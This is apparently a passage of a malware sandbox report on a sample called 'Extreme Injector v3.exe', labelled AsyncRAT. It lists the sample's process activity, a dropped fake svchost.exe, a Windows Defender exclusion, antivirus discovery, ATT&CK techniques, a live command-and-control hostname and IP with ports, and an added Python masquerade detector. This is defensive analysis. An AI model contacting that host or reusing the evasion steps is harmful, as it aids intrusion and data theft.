Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Extreme Injector v3.exe, 00000000.00000002.2917443037.0000000000924000.00000004.00000020.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2917443037.000000000097D000.00000004.00000020.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2929290109.000000001B437000.00000004.00000020.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2929290109.000000001B40A000.00000004.00000020.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2929290109.000000001B370000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Extreme Injector v3.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
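The svchost.exe rows above come from the copy the sample dropped to C:\Users\user\AppData\Roaming: a Windows system process name running from a user-writable directory, which is the classic masquerading tell. The Python below is an added example, not code from Joe Sandbox or from any detection rule set. It parses the report's fused "Source: <image path><action>" rows, pulls out the source image path, and flags any system process name whose directory is not on a small allow-list. The process-name list, the expected directories and the benign control row (a genuine System32 svchost.exe) are assumptions constructed for the example; the four other sample rows are copied from the report.

```python
"""Flag system-process names that run from unexpected directories.

Added example, not part of the Joe Sandbox report. It parses the report's
fused "Source: <image path><action>" rows and checks each image path
against an allow-list. The process-name list, the expected directories
and the benign control row are assumptions made for this example.
"""
import ntpath
import re
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Assumed: Windows process names malware commonly borrows.
SYSTEM_PROCESS_NAMES: Set[str] = {
    "svchost.exe", "lsass.exe", "csrss.exe", "services.exe",
    "smss.exe", "wininit.exe", "winlogon.exe", "explorer.exe",
}

# Assumed: directories where a genuine copy of each name lives (lower-case).
EXPECTED_DIRS: Dict[str, Set[str]] = {
    name: {r"c:\windows\system32", r"c:\windows\syswow64"}
    for name in SYSTEM_PROCESS_NAMES
}
EXPECTED_DIRS["explorer.exe"] = {r"c:\windows"}

# The report fuses the image path and the action, e.g.
# "Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: ..."
# The path ends at the first ".exe" that is followed by a capital letter.
_SOURCE_RE = re.compile(r"^\s*Source:\s*(?P<path>[A-Za-z]:\\.*?\.exe)(?=[A-Z]|$)")


def extract_image_paths(report_lines: Iterable[str]) -> List[str]:
    """Pull the source image path out of each report row that has one."""
    paths = []
    for line in report_lines:
        m = _SOURCE_RE.match(line)
        if m:
            paths.append(m.group("path"))
    return paths


def split_path(path: str) -> Tuple[str, str]:
    """Return (directory, file name), normalised and lower-cased."""
    clean = ntpath.normpath(path.strip()).lower()
    return ntpath.split(clean)


def masquerade_reason(path: str) -> Optional[str]:
    """Explain why a path looks like a masquerading system process, or None."""
    directory, name = split_path(path)
    if name not in SYSTEM_PROCESS_NAMES:
        return None
    if directory in EXPECTED_DIRS[name]:
        return None
    return f"{name} expected under {sorted(EXPECTED_DIRS[name])}, found in {directory}"


def flag_masquerading(paths: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (path, reason) once per distinct suspicious path."""
    seen: Set[str] = set()
    flagged = []
    for path in paths:
        reason = masquerade_reason(path)
        if reason and path not in seen:
            seen.add(path)
            flagged.append((path, reason))
    return flagged


# Constructed sample: four rows copied from the report plus one benign
# control row (a real svchost.exe location) that must not be flagged.
SAMPLE_ROWS = [
    "Source: C:\\Users\\user\\Desktop\\Extreme Injector v3.exeQueries volume information: C:\\ VolumeInformation",
    "Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exeQueries volume information: C:\\ VolumeInformation",
    "Source: C:\\Users\\user\\AppData\\Roaming\\svchost.exeQueries volume information: C:\\Users\\user\\AppData\\Roaming\\svchost.exe VolumeInformation",
    "Source: C:\\Users\\user\\AppData\\Roaming\\svchost.exeQueries volume information: C:\\Users\\user\\AppData\\Roaming\\svchost.exe VolumeInformation",
    "Source: C:\\Windows\\System32\\svchost.exeQueries volume information: C:\\ VolumeInformation",
]

if __name__ == "__main__":
    for path, reason in flag_masquerading(extract_image_paths(SAMPLE_ROWS)):
        print(f"SUSPICIOUS {path}: {reason}")
```

The same masquerade_reason check works unchanged on image paths from an EDR process list or Sysmon event 1; the report parser is only there so the example runs on the rows shown on this page.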

                      Stealing of Sensitive Information

Source: Yara match | File source: Extreme Injector v3.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Extreme Injector v3.exe PID: 7412, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                      Remote Access Functionality

Source: Yara match | File source: Extreme Injector v3.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Extreme Injector v3.exe PID: 7412, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
MITRE ATT&CK matrix (a leading number is the signature count Joe Sandbox shows on that technique; cells without a number are the matrix's unmatched techniques):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 Scheduled Task/Job | 12 Process Injection | 11 Masquerading | OS Credential Dumping | 541 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 1 DLL Side-Loading | 21 Registry Run Keys / Startup Folder | 151 Virtualization/Sandbox Evasion | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Software Packing | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1582591; Sample: Extreme Injector v3.exe; Startdate: 31/12/2024; Architecture: WINDOWS; Score: 100

Behavior graph (node text recovered from the graph image):

• Start node: DNS names or-officials.gl.at.ply.gg and ip-api.com; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 25 other signatures. Processes started: Extreme Injector v3.exe (15, 5), svchost.exe, svchost.exe, 2 other processes
• Extreme Injector v3.exe: contacts or-officials.gl.at.ply.gg 147.185.221.24 (ports 43985, 49823, 49920; SALSGIVERUS, United States) and ip-api.com 208.95.112.1 (ports 49730, 80; TUT-ASUS, United States); drops C:\Users\user\AppData\Roaming\svchost.exe (PE32); signatures: Protects its processes via BreakOnTermination flag; Adds a directory exclusion to Windows Defender; starts powershell.exe (23), powershell.exe (23), powershell.exe (22) and 2 other processes
• svchost.exe (first dropped instance): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
• powershell.exe (first instance): Loading BitLocker PowerShell Module; each powershell.exe starts a conhost.exe, and the 2 other processes start two more conhost.exe

Source | Detection | Scanner | Label | Link
Extreme Injector v3.exe | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
Extreme Injector v3.exe | 100% | Avira | HEUR/AGEN.1305769 |
Extreme Injector v3.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Avira | HEUR/AGEN.1305769 |
C:\Users\user\AppData\Roaming\svchost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\svchost.exe | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://schemas.microsoft.co | 0% | Avira URL Cloud | safe |
http://osoft.com/pki/ceooCerAut_2010-06 | 0% | Avira URL Cloud | safe |
http://www.micom/pki/certs/Miut_2010-06-23.cr | 0% | Avira URL Cloud | safe |
or-officials.gl.at.ply.gg | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
or-officials.gl.at.ply.gg | 147.185.221.24 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
or-officials.gl.at.ply.gg | true | Avira URL Cloud: malware | unknown
http://ip-api.com/line/?fields=hosting | false | | high
URLs from memory and binary data (Name / Source / Malicious / Antivirus Detection / Reputation)

http://nuget.org/NuGet.exe
  Source: powershell.exe, 00000001.00000002.1746315456.000001B2B0E64000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1854477434.0000012E72044000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2014105281.000001C0EC554000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://crl.m
  Source: powershell.exe, 00000004.00000002.1876687071.0000012E7A878000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://crl.micro
  Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://pesterbdd.com/images/Pester.png
  Source: powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://schemas.xmlsoap.org/soap/encoding/
  Source: powershell.exe, 00000001.00000002.1722348335.000001B2A1019000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1783319483.0000012E621F8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.1917701450.000001C0DC709000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://www.apache.org/licenses/LICENSE-2.0.html
  Source: powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://schemas.xmlsoap.org/wsdl/
  Source: powershell.exe, 00000001.00000002.1722348335.000001B2A1019000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1783319483.0000012E621F8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.1917701450.000001C0DC709000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

https://contoso.com/
  Source: powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

https://nuget.org/nuget.exe
  Source: powershell.exe, 00000001.00000002.1746315456.000001B2B0E64000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1854477434.0000012E72044000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.2014105281.000001C0EC554000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://crl.micro/pki/crl/productCerAut_2010-06-2
  Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://www.microsoft.co
  Source: powershell.exe, 0000000B.00000002.2293488165.000001655A8B5000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

https://contoso.com/License
  Source: powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://ip-api.com
